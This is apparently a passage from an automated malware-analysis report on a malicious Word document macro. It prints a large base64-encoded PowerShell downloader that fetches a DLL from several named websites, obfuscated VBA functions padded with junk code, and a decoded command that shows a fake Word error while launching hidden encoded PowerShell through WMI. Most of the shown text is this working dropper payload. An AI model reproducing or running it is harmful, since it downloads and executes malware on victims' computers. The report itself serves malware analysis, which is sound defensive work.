IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAFcAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByAGUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwArACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAHMAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsAJwB1ACcAKQArACgAJwBsACcAKwAnAG8AdQBzAC8AJwArACcARABaAHoALwAnACkAKwAnAEAAJwArACgAJwB3ACcAKwAnAF0AeABtAFsAJwApACsAKAAnAHYAOgAvACcAKwAnAC8AJwApACsAKAAnAHcAdwAnACsAJwB3ACcAKQArACgAJwAuAGEAZwByACcAKwAnAGkAJwArACcAYwBhAG0AcAAnACsAJwBlAGcAJwApACsAKAAnAGcAaQAnACsAJwBvACcAKwAnAGMAbwByACcAKQArACgAJwB0AGUAJwArACcAYwBvAG0AbwAnACkAKwAnAHQAdAAnACsAJwBvAC4AJwArACgAJwBpAHQAJwArACcALwAnACkAKwAoACcAdwBwACcAKwAnAC0AJwApACsAKAAnAGEAJwArACcAZABtACcAKQArACgAJwBpACcAKwAnAG4AJwArACcALwBzADcAJwArACcAcAAxAC8AQAB3AF0AJwArACcAeABtAFsAJwApACsAJwB2ACcAKwAnAHMAOgAnACsAJwAvAC8AJwArACcAdwB3ACcAKwAnAHcAJwArACgAJwAuAHMAdABhAHIAbAAnACsAJwBpACcAKwAnAG4AJwApACsAKAAnAGcAdABlAGMAaABzAC4AYwBvAG0AJwArACcALwAnACsAJwBHAE4ATQAnACsAJwAvAEAAdwAnACsAJwBdAHgAbQBbAHYAJwApACsAKAAnADoAJwArACcALwAnACsAJwAvAGgAZQBsAGwAYQBzACcAKQArACgAJwAtAGQAJwArACcAYQByAG0AcwAnACsAJwB0AGEAZAAnACsAJwB0AC4AZAAnACsAJwBlACcAKQArACcALwBjACcAKwAoACcAZwBpAC0AYgBpAG4AJwArACcALwBaACcAKQArACcAUwAnACsAKAAnAG8AJwArACcAbwAvACcAKQApAC4AIgByAEUAcABsAEEAYABjAGUAIgAoACgAKAAnAHcAXQB4AG0AJwArACcAWwAnACkAKwAnAHYAJwApACwAKABbAGEAcgByAGEAeQBdACgAKAAnAGQAcwAnACsAKAAnAGUAJwArACcAdwBmACcAKQApACwAKAA,,) -> 0

                      Mid

                      Len("\x01 w]xm[vw]xm[vcw]xm[vmw]xm[vdw]xm[v w]xm[vcw]xm[vmw]xm[vdw]xm[v w]xm[v/w]xm[vcw]xm[v w]xm[vmw]xm[v^w]xm[vsw]xm[v^w]xm[vgw]xm[v w]xm[v%w]xm[vuw]xm[vsw]xm[vew]xm[vrw]xm[vnw]xm[vaw]xm[vmw]xm[vew]xm[v%w]xm[v w]xm[v/w]xm[vvw]xm[v w]xm[vWw]xm[vow]xm[v^w]xm[vrw]xm[vdw]xm[v w]xm[vew]xm[vxw]xm[vpw]xm[v^w]xm[vew]xm[vrw]xm[viw]xm[vew]xm[vnw]xm[v^w]xm[vcw]xm[vew]xm[vdw]xm[v w]xm[vaw]xm[vnw]xm[v w]xm[vew]xm[vrw]xm[v^w]xm[vrw]xm[vow]xm[vrw]xm[v w]xm[vtw]xm[vrw]xm[vyw]xm[viw]xm[v^w]xm[vnw]xm[vgw]xm[v w]xm[vtw]xm[vow]xm[v w]xm[vow]xm[vpw]xm[v^w]xm[vew]xm[vnw]xm[v w]xm[vtw]xm[vhw]xm[v^w]xm[vew]xm[v w]xm[vfw]xm[viw]xm[v^w]xm[vlw]xm[vew]xm[v.w]xm[v w]xm[v&w]xm[v w]xm[vpw]xm[v^w]xm[vow]xm[vww]xm[vew]xm[v^w]xm[vrw]xm[vsw]xm[v^w]xm[vhw]xm[vew]xm[v^w]xm[vlw]xm[vlw]xm[v^w]xm[v w]xm[v-w]xm[vww]xm[v w]xm[vhw]xm[viw]xm[v^w]xm[vdw]xm[vdw]xm[v^w]xm[vew]xm[vnw]xm[v w]xm[v-w]xm[v^w]xm[vew]xm[v^w]xm[vnw]xm[vcw]xm[v w]xm[v w]xm[v w]xm[v w]xm[v w]xm[v w]xm[v w]xm[v w]xm[v w]xm[v w]xm[v w]xm[v w]xm[v w]xm[v IAAw]xm[vgACw]xm[vQAOw]xm[vABaw]xm[vAEcw]xm[vAIAw]xm[vAgAw]xm[vD0Aw]xm[vIABw]xm[vbAHw]xm[vQAWw]xm[vQBww]xm[vAGUw]xm[vAXQw]xm[vAoAw]xm[vCIAw]xm[vewAw]xm[vyAHw]xm[v0Aew]xm[vwA1w]xm[vAH0w]xm[vAeww]xm[vAwAw]xm[vH0Aw]xm[vewAw]xm[vxAHw]xm[v0Aew]xm[vwAzw]xm[vAH0w]xm[vAeww]xm[vA0Aw]xm[vH0Aw]xm[vIgAw]xm[vtAGw]xm[vYAIw]xm[vAAnw]xm[vAFQw]xm[vARQw]xm[vAnAw]xm[vCwAw]xm[vJwBw]xm[vtACw]xm[v4AJw]xm[vwAsw]xm[vACcw]xm[vAUww]xm[vB5Aw]xm[vCcAw]xm[vLAAw]xm[vnAGw]xm[vkAbw]xm[vwAnw]xm[vACww]xm[vAJww]xm[vAuAw]xm[vEQAw]xm[vSQBw]xm[vyAEw]xm[vUAQw]xm[vwB0w]xm[vAE8w]xm[vAUgw]xm[vBZAw]xm[vCcAw]xm[vLAAw]xm[vnAFw]xm[vMAJw]xm[vwApw]xm[vADsw]xm[vAIAw]xm[vAgAw]xm[vCAAw]xm[vJABw]xm[vEADw]xm[vAAQw]xm[vwBxw]xm[vACAw]xm[vAPQw]xm[vAgAw]xm[vFsAw]xm[vVABw]xm[vZAHw]xm[vAAZw]xm[vQBdw]xm[vACgw]xm[vAIgw]xm[vB7Aw]xm[vDIAw]xm[vfQBw]xm[v7ADw]xm[vEAfw]xm[vQB7w]xm[vADAw]xm[vAfQw]xm[vB7Aw]xm[vDMAw]xm[vfQBw]xm[v7ADw]xm[vQAfw]xm[vQAiw]xm[vACAw]xm[vALQw]xm[vBmAw]xm[vCcAw]xm[vcwBw]xm[vFAHw]xm[vIAdw]xm[vgBJw]xm[vAEMw]xm[vARQw]xm[vBQAw]xm[vG8Aw]xm[vJwAw]xm[vsACw]xm[vcAVw]xm[vABlw]xm[vAG0w]xm[vALgw]xm[vBuAw]xm[vEUAw]xm[vdAAw]xm[vuACw]xm[vcALw]xm[vAAnw]xm[vAFMw]xm[vAWQw]xm[vBzAw]xm[vCcAw]xm[vLAAw]xm[vnAGw]xm[vkATw]xm[vgB0w]xm[vAG0w]xm[vAYQw]xm[vAnAw]xm[vCwAw]xm[vJwBw]xm[vuAEw]xm[vEARw]xm[vwBFw]xm[vAFIw]xm[vAJww]xm[vApAw]xm[vCAAw]xm[vOwAw]xm[vgACw]xm[vQASw]xm[vgBiw]xm[vAHow]xm[vAMww]xm[vB5Aw]xm[vGEAw]xm[vYQAw]xm[v9ACw]xm[vQARw]xm[vAA1w]xm[vADMw]xm[vARQw]xm[vAgAw]xm[vCsAw]xm[vIABw]xm[vbAGw]xm[vMAaw]xm[vABhw]xm[vAHIw]xm[vAXQw]xm[vAoAw]xm[vDYAw]xm[vNAAw]xm[vpACw]xm[vAAKw]xm[vwAgw]xm[vACQw]xm[vAUgw]xm[vA3Aw]xm[vDYAw]xm[vUAAw]xm[v7ACw]xm[vQARw]xm[vwA3w]xm[vADMw]xm[vATww]xm[vA9Aw]xm[vCgAw]xm[vJwBw]xm[vGACw]xm[vcAKw]xm[vwAow]xm[vACcw]xm[vAMAw]xm[vAnAw]xm[vCsAw]xm[vJwAw]xm[v0AFw]xm[vYAJw]xm[vwApw]xm[vACkw]xm[vAOww]xm[vAgAw]xm[vCAAw]xm[vKAAw]xm[vgACw]xm[vAARw]xm[vwBlw]xm[vAHQw]xm[vALQw]xm[vBWAw]xm[vGEAw]xm[vcgBw]xm[vJAEw]xm[vEAQw]xm[vgBsw]xm[vAGUw]xm[vAIAw]xm[vAoAw]xm[vCIAw]xm[vOABw]xm[vaACw]xm[vIAKw]xm[vwAiw]xm[vAGcw]xm[vAIgw]xm[vApAw]xm[vCAAw]xm[vIAAw]xm[vtAHw]xm[vYAQw]xm[vQBsw]xm[vAFUw]xm[vAZQw]xm[vBPAw]xm[vE4Aw]xm[vIAAw]xm[vpADw]xm[voAOw]xm[vgAiw]xm[vAGMw]xm[vAcgw]xm[vBFAw]xm[vGAAw]xm[vQQBw]xm[vgAFw]xm[vQAZw]xm[vQBEw]xm[vAGkw]xm[vAUgw]xm[vBgAw]xm[vGUAw]xm[vQwBw]xm[v0AGw]xm[vAAbw]xm[vwBSw]xm[vAHkw]xm[vAIgw]xm[vAoAw]xm[vCQAw]xm[vSABw]xm[vPAEw]xm[v0ARw]xm[vQAgw]xm[vACsw]xm[vAIAw]xm[vAoAw]xm[vCgAw]xm[vJwBw]xm[v0AEw]xm[vsAJw]xm[vwArw]xm[vACgw]xm[vAJww]xm[vBMAw]xm[vCcAw]xm[vKwAw]xm[vnAEw]xm[vsAJw]xm[vwArw]xm[vACcw]xm[vAagw]xm[vBsAw]xm[vDQAw]xm[vOABw]xm[vrAHw]xm[vIAJw]xm[vwApw]xm[vACsw]xm[vAJww]xm[vB0Aw]xm[vCcAw]xm[vKwAw]xm[voACw]xm[vcASw]xm[vwBMw]xm[vAE4w]xm[vAcQw]xm[vAnAw]xm[vCsAw]xm[vJwBw]xm[vtADw]xm[vkAJw]xm[vwApw]xm[vACsw]xm[vAKAw]xm[vAnAw]xm[vHQAw]xm[vJwAw]xm[vrACw]xm[vcAew]xm[vQA5w]xm[vACcw]xm[vAKQw]xm[vArAw]xm[vCcAw]xm[vdAAw]xm[vnACw]xm[vsAJw]xm[vwBLw]xm[vAEww]xm[vAJww]xm[vApAw]xm[vC0Aw]xm[vcgBw]xm[vlAHw]xm[vAAbw]xm[vABBw]xm[vAGMw]xm[vAZQw]xm[vAgAw]xm[vCAAw]xm[vKAAw]xm[vnAHw]xm[vQASw]xm[vwAnw]xm[vACsw]xm[vAJww]xm[vBMAw]xm[vCcAw]xm[vKQAw]xm[vsAFw]xm[vsAQw]xm[vwBIw]xm[vAEEw]xm[vAcgw]xm[vBdAw]xm[vDkAw]xm[vMgAw]xm[v) -> 16527

                      Vc1971csmq7a5g9

                      W7x42qfm4_lw

                      executed
                      145

                      Goto kshfoytP

                      146

                      Set ggGVJ = dUNUgHJG

                      dUNUgHJG

                      147

                      Dim oaACDga as Double

                      148

                      oaACDga = Fix(kshfoytP)

                      Fix

                      kshfoytP

                      149

                      If oaACDga <> kshfoytP Then

                      kshfoytP

                      149

                      Exit Function

                      149

                      Endif

                      150

                      Dim RXzua as Double

                      151

                      RXzua = oaACDga ^ (1 / 3)

                      152

                      If Fix(RXzua) ^ 3 = oaACDga Then

                      Fix

                      153

                      dxRvhumeH = True

                      154

                      Elseif (Fix(RXzua) + 1) ^ 3 = oaACDga Then

                      Fix

                      155

                      dxRvhumeH = True

                      156

                      Endif

                      156

                      kshfoytP:

                      158

                      Goto ZYHZlIii

                      159

                      Set sTlFD = SetWuCGdA

                      SetWuCGdA

                      160

                      Dim CXFGDHlI as Double

                      161

                      CXFGDHlI = Fix(ZYHZlIii)

                      Fix

                      ZYHZlIii

                      162

                      If CXFGDHlI <> ZYHZlIii Then

                      ZYHZlIii

                      162

                      Exit Function

                      162

                      Endif

                      163

                      Dim QKtUz as Double

                      164

                      QKtUz = CXFGDHlI ^ (1 / 3)

                      165

                      If Fix(QKtUz) ^ 3 = CXFGDHlI Then

                      Fix

                      166

                      dNfeF = True

                      167

                      Elseif (Fix(QKtUz) + 1) ^ 3 = CXFGDHlI Then

                      Fix

                      168

                      dNfeF = True

                      169

                      Endif

                      169

                      ZYHZlIii:

                      171

                      End Function

                      Function Ipls8rqp952u2lk1, APIs: 26, Strings: 0, Number of lines: 66, Relevance: 32.566
                      APIsMeta Information

                      zCXyyY

                      Fix

                      JSrfhd

                      JSrfhd

                      Fix

                      Fix

                      szALCGBF

                      Fix

                      XFTxEQJDN

                      XFTxEQJDN

                      Fix

                      Fix

                      Part of subcall function Cws3jiyt47ovpsrhug@Gx8fznt8p0b: Replace

                      Part of subcall function Cws3jiyt47ovpsrhug@Gx8fznt8p0b: H1kcw0gko9w6ta3y

                      YjbuICHY

                      Fix

                      RXvmIZQm

                      RXvmIZQm

                      Fix

                      Fix

                      rUIOAx

                      Fix

                      gIKrmCJj

                      gIKrmCJj

                      Fix

                      Fix

                      LineInstructionMeta Information
                      172

                      Function Ipls8rqp952u2lk1(V8_prqa_b590f6uz6z)

                      173

                      On Error Resume Next

                      executed
                      174

                      Goto JSrfhd

                      175

                      Set llWECD = zCXyyY

                      zCXyyY

                      176

                      Dim xbIYArN as Double

                      177

                      xbIYArN = Fix(JSrfhd)

                      Fix

                      JSrfhd

                      178

                      If xbIYArN <> JSrfhd Then

                      JSrfhd

                      178

                      Exit Function

                      178

                      Endif

                      179

                      Dim zHdGqDLim as Double

                      180

                      zHdGqDLim = xbIYArN ^ (1 / 3)

                      181

                      If Fix(zHdGqDLim) ^ 3 = xbIYArN Then

                      Fix

                      182

                      iTfwbHGDH = True

                      183

                      Elseif (Fix(zHdGqDLim) + 1) ^ 3 = xbIYArN Then

                      Fix

                      184

                      iTfwbHGDH = True

                      185

                      Endif

                      185

                      JSrfhd:

                      187

                      Hvdntqk_ku4y1u_ = V8_prqa_b590f6uz6z

                      188

                      Goto XFTxEQJDN

                      189

                      Set vRYIMlBHH = szALCGBF

                      szALCGBF

                      190

                      Dim vEHmFIM as Double

                      191

                      vEHmFIM = Fix(XFTxEQJDN)

                      Fix

                      XFTxEQJDN

                      192

                      If vEHmFIM <> XFTxEQJDN Then

                      XFTxEQJDN

                      192

                      Exit Function

                      192

                      Endif

                      193

                      Dim dTSeMQG as Double

                      194

                      dTSeMQG = vEHmFIM ^ (1 / 3)

                      195

                      If Fix(dTSeMQG) ^ 3 = vEHmFIM Then

                      Fix

                      196

                      MiKCE = True

                      197

                      Elseif (Fix(dTSeMQG) + 1) ^ 3 = vEHmFIM Then

                      Fix

                      198

                      MiKCE = True

                      199

                      Endif

                      199

                      XFTxEQJDN:

                      201

                      Xz0p6qe4s08b07kkt = Cws3jiyt47ovpsrhug(Hvdntqk_ku4y1u_)

                      202

                      Goto RXvmIZQm

                      203

                      Set GDDUGJd = YjbuICHY

                      YjbuICHY

                      204

                      Dim GdxqnN as Double

                      205

                      GdxqnN = Fix(RXvmIZQm)

                      Fix

                      RXvmIZQm

                      206

                      If GdxqnN <> RXvmIZQm Then

                      RXvmIZQm

                      206

                      Exit Function

                      206

                      Endif

                      207

                      Dim DqmzWgJHy as Double

                      208

                      DqmzWgJHy = GdxqnN ^ (1 / 3)

                      209

                      If Fix(DqmzWgJHy) ^ 3 = GdxqnN Then

                      Fix

                      210

                      NhxAGvAH = True

                      211

                      Elseif (Fix(DqmzWgJHy) + 1) ^ 3 = GdxqnN Then

                      Fix

                      212

                      NhxAGvAH = True

                      213

                      Endif

                      213

                      RXvmIZQm:

                      215

                      Ipls8rqp952u2lk1 = Xz0p6qe4s08b07kkt

                      216

                      Goto gIKrmCJj

                      217

                      Set InptugrzA = rUIOAx

                      rUIOAx

                      218

                      Dim UDFpCBJJ as Double

                      219

                      UDFpCBJJ = Fix(gIKrmCJj)

                      Fix

                      gIKrmCJj

                      220

                      If UDFpCBJJ <> gIKrmCJj Then

                      gIKrmCJj

                      220

                      Exit Function

                      220

                      Endif

                      221

                      Dim zKEHRtJGG as Double

                      222

                      zKEHRtJGG = UDFpCBJJ ^ (1 / 3)

                      223

                      If Fix(zKEHRtJGG) ^ 3 = UDFpCBJJ Then

                      Fix

                      224

                      SrmTEEB = True

                      225

                      Elseif (Fix(zKEHRtJGG) + 1) ^ 3 = UDFpCBJJ Then

                      Fix

                      226

                      SrmTEEB = True

                      227

                      Endif

                      227

                      gIKrmCJj:

                      229

                      End Function

                      Function Cws3jiyt47ovpsrhug, APIs: 2, Strings: 1, Number of lines: 3, Relevance: 10.503
                      APIsMeta Information

                      Replace

                      		Replace("ww]xm[vinw]xm[vmw]xm[vgmw]xm[vtw]xm[vw]xm[vw]xm[vw]xm[vsw]xm[vw]xm[vw]xm[v:ww]xm[vw]xm[vinw]xm[v3w]xm[v2w]xm[v_w]xm[vw]xm[vpw]xm[vw]xm[vrow]xm[vw]xm[vcew]xm[vsw]xm[vsw]xm[vw]xm[v","w]xm[v",) -> winmgmts:win32_process Replace("w]xm[vw]xm[vcw]xm[vmw]xm[vdw]xm[v w]xm[vcw]xm[vmw]xm[vdw]xm[v w]xm[v/w]xm[vcw]xm[v w]xm[vmw]xm[v^w]xm[vsw]xm[v^w]xm[vgw]xm[v w]xm[v%w]xm[vuw]xm[vsw]xm[vew]xm[vrw]xm[vnw]xm[vaw]xm[vmw]xm[vew]xm[v%w]xm[v w]xm[v/w]xm[vvw]xm[v w]xm[vWw]xm[vow]xm[v^w]xm[vrw]xm[vdw]xm[v w]xm[vew]xm[vxw]xm[vpw]xm[v^w]xm[vew]xm[vrw]xm[viw]xm[vew]xm[vnw]xm[v^w]xm[vcw]xm[vew]xm[vdw]xm[v w]xm[vaw]xm[vnw]xm[v w]xm[vew]xm[vrw]xm[v^w]xm[vrw]xm[vow]xm[vrw]xm[v w]xm[vtw]xm[vrw]xm[vyw]xm[viw]xm[v^w]xm[vnw]xm[vgw]xm[v w]xm[vtw]xm[vow]xm[v w]xm[vow]xm[vpw]xm[v^w]xm[vew]xm[vnw]xm[v w]xm[vtw]xm[vhw]xm[v^w]xm[vew]xm[v w]xm[vfw]xm[viw]xm[v^w]xm[vlw]xm[vew]xm[v.w]xm[v w]xm[v&w]xm[v w]xm[vpw]xm[v^w]xm[vow]xm[vww]xm[vew]xm[v^w]xm[vrw]xm[vsw]xm[v^w]xm[vhw]xm[vew]xm[v^w]xm[vlw]xm[vlw]xm[v^w]xm[v w]xm[v-w]xm[vww]xm[v w]xm[vhw]xm[viw]xm[v^w]xm[vdw]xm[vdw]xm[v^w]xm[vew]xm[vnw]xm[v w]xm[v-w]xm[v^w]xm[vew]xm[v^w]xm[vnw]xm[vcw]xm[v w]xm[v w]xm[v w]xm[v w]xm[v w]xm[v w]xm[v w]xm[v w]xm[v w]xm[v w]xm[v w]xm[v w]xm[v w]xm[v IAAw]xm[vgACw]xm[vQAOw]xm[vABaw]xm[vAEcw]xm[vAIAw]xm[vAgAw]xm[vD0Aw]xm[vIABw]xm[vbAHw]xm[vQAWw]xm[vQBww]xm[vAGUw]xm[vAXQw]xm[vAoAw]xm[vCIAw]xm[vewAw]xm[vyAHw]xm[v0Aew]xm[vwA1w]xm[vAH0w]xm[vAeww]xm[vAwAw]xm[vH0Aw]xm[vewAw]xm[vxAHw]xm[v0Aew]xm[vwAzw]xm[vAH0w]xm[vAeww]xm[vA0Aw]xm[vH0Aw]xm[vIgAw]xm[vtAGw]xm[vYAIw]xm[vAAnw]xm[vAFQw]xm[vARQw]xm[vAnAw]xm[vCwAw]xm[vJwBw]xm[vtACw]xm[v4AJw]xm[vwAsw]xm[vACcw]xm[vAUww]xm[vB5Aw]xm[vCcAw]xm[vLAAw]xm[vnAGw]xm[vkAbw]xm[vwAnw]xm[vACww]xm[vAJww]xm[vAuAw]xm[vEQAw]xm[vSQBw]xm[vyAEw]xm[vUAQw]xm[vwB0w]xm[vAE8w]xm[vAUgw]xm[vBZAw]xm[vCcAw]xm[vLAAw]xm[vnAFw]xm[vMAJw]xm[vwApw]xm[vADsw]xm[vAIAw]xm[vAgAw]xm[vCAAw]xm[vJABw]xm[vEADw]xm[vAAQw]xm[vwBxw]xm[vACAw]xm[vAPQw]xm[vAgAw]xm[vFsAw]xm[vVABw]xm[vZAHw]xm[vAAZw]xm[vQBdw]xm[vACgw]xm[vAIgw]xm[vB7Aw]xm[vDIAw]xm[vfQBw]xm[v7ADw]xm[vEAfw]xm[vQB7w]xm[vADAw]xm[vAfQw]xm[vB7Aw]xm[vDMAw]xm[vfQBw]xm[v7ADw]xm[vQAfw]xm[vQAiw]xm[vACAw]xm[vALQw]xm[vBmAw]xm[vCcAw]xm[vcwBw]xm[vFAHw]xm[vIAdw]xm[vgBJw]xm[vAEMw]xm[vARQw]xm[vBQAw]xm[vG8Aw]xm[vJwAw]xm[vsACw]xm[vcAVw]xm[vABlw]xm[vAG0w]xm[vALgw]xm[vBuAw]xm[vEUAw]xm[vdAAw]xm[vuACw]xm[vcALw]xm[vAAnw]xm[vAFMw]xm[vAWQw]xm[vBzAw]xm[vCcAw]xm[vLAAw]xm[vnAGw]xm[vkATw]xm[vgB0w]xm[vAG0w]xm[vAYQw]xm[vAnAw]xm[vCwAw]xm[vJwBw]xm[vuAEw]xm[vEARw]xm[vwBFw]xm[vAFIw]xm[vAJww]xm[vApAw]xm[vCAAw]xm[vOwAw]xm[vgACw]xm[vQASw]xm[vgBiw]xm[vAHow]xm[vAMww]xm[vB5Aw]xm[vGEAw]xm[vYQAw]xm[v9ACw]xm[vQARw]xm[vAA1w]xm[vADMw]xm[vARQw]xm[vAgAw]xm[vCsAw]xm[vIABw]xm[vbAGw]xm[vMAaw]xm[vABhw]xm[vAHIw]xm[vAXQw]xm[vAoAw]xm[vDYAw]xm[vNAAw]xm[vpACw]xm[vAAKw]xm[vwAgw]xm[vACQw]xm[vAUgw]xm[vA3Aw]xm[vDYAw]xm[vUAAw]xm[v7ACw]xm[vQARw]xm[vwA3w]xm[vADMw]xm[vATww]xm[vA9Aw]xm[vCgAw]xm[vJwBw]xm[vGACw]xm[vcAKw]xm[vwAow]xm[vACcw]xm[vAMAw]xm[vAnAw]xm[vCsAw]xm[vJwAw]xm[v0AFw]xm[vYAJw]xm[vwApw]xm[vACkw]xm[vAOww]xm[vAgAw]xm[vCAAw]xm[vKAAw]xm[vgACw]xm[vAARw]xm[vwBlw]xm[vAHQw]xm[vALQw]xm[vBWAw]xm[vGEAw]xm[vcgBw]xm[vJAEw]xm[vEAQw]xm[vgBsw]xm[vAGUw]xm[vAIAw]xm[vAoAw]xm[vCIAw]xm[vOABw]xm[vaACw]xm[vIAKw]xm[vwAiw]xm[vAGcw]xm[vAIgw]xm[vApAw]xm[vCAAw]xm[vIAAw]xm[vtAHw]xm[vYAQw]xm[vQBsw]xm[vAFUw]xm[vAZQw]xm[vBPAw]xm[vE4Aw]xm[vIAAw]xm[vpADw]xm[voAOw]xm[vgAiw]xm[vAGMw]xm[vAcgw]xm[vBFAw]xm[vGAAw]xm[vQQBw]xm[vgAFw]xm[vQAZw]xm[vQBEw]xm[vAGkw]xm[vAUgw]xm[vBgAw]xm[vGUAw]xm[vQwBw]xm[v0AGw]xm[vAAbw]xm[vwBSw]xm[vAHkw]xm[vAIgw]xm[vAoAw]xm[vCQAw]xm[vSABw]xm[vPAEw]xm[v0ARw]xm[vQAgw]xm[vACsw]xm[vAIAw]xm[vAoAw]xm[vCgAw]xm[vJwBw]xm[v0AEw]xm[vsAJw]xm[vwArw]xm[vACgw]xm[vAJww]xm[vBMAw]xm[vCcAw]xm[vKwAw]xm[vnAEw]xm[vsAJw]xm[vwArw]xm[vACcw]xm[vAagw]xm[vBsAw]xm[vDQAw]xm[vOABw]xm[vrAHw]xm[vIAJw]xm[vwApw]xm[vACsw]xm[vAJww]xm[vB0Aw]xm[vCcAw]xm[vKwAw]xm[voACw]xm[vcASw]xm[vwBMw]xm[vAE4w]xm[vAcQw]xm[vAnAw]xm[vCsAw]xm[vJwBw]xm[vtADw]xm[vkAJw]xm[vwApw]xm[vACsw]xm[vAKAw]xm[vAnAw]xm[vHQAw]xm[vJwAw]xm[vrACw]xm[vcAew]xm[vQA5w]xm[vACcw]xm[vAKQw]xm[vArAw]xm[vCcAw]xm[vdAAw]xm[vnACw]xm[vsAJw]xm[vwBLw]xm[vAEww]xm[vAJww]xm[vApAw]xm[vC0Aw]xm[vcgBw]xm[vlAHw]xm[vAAbw]xm[vABBw]xm[vAGMw]xm[vAZQw]xm[vAgAw]xm[vCAAw]xm[vKAAw]xm[vnAHw]xm[vQASw]xm[vwAnw]xm[vACsw]xm[vAJww]xm[vBMAw]xm[vCcAw]xm[vKQAw]xm[vsAFw]xm[vsAQw]xm[vwBIw]xm[vAEEw]xm[vAcgw]xm[vBdAw]xm[vDkAw]xm[vMgAw]xm[vpACw,"w]xm[v",) -> cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 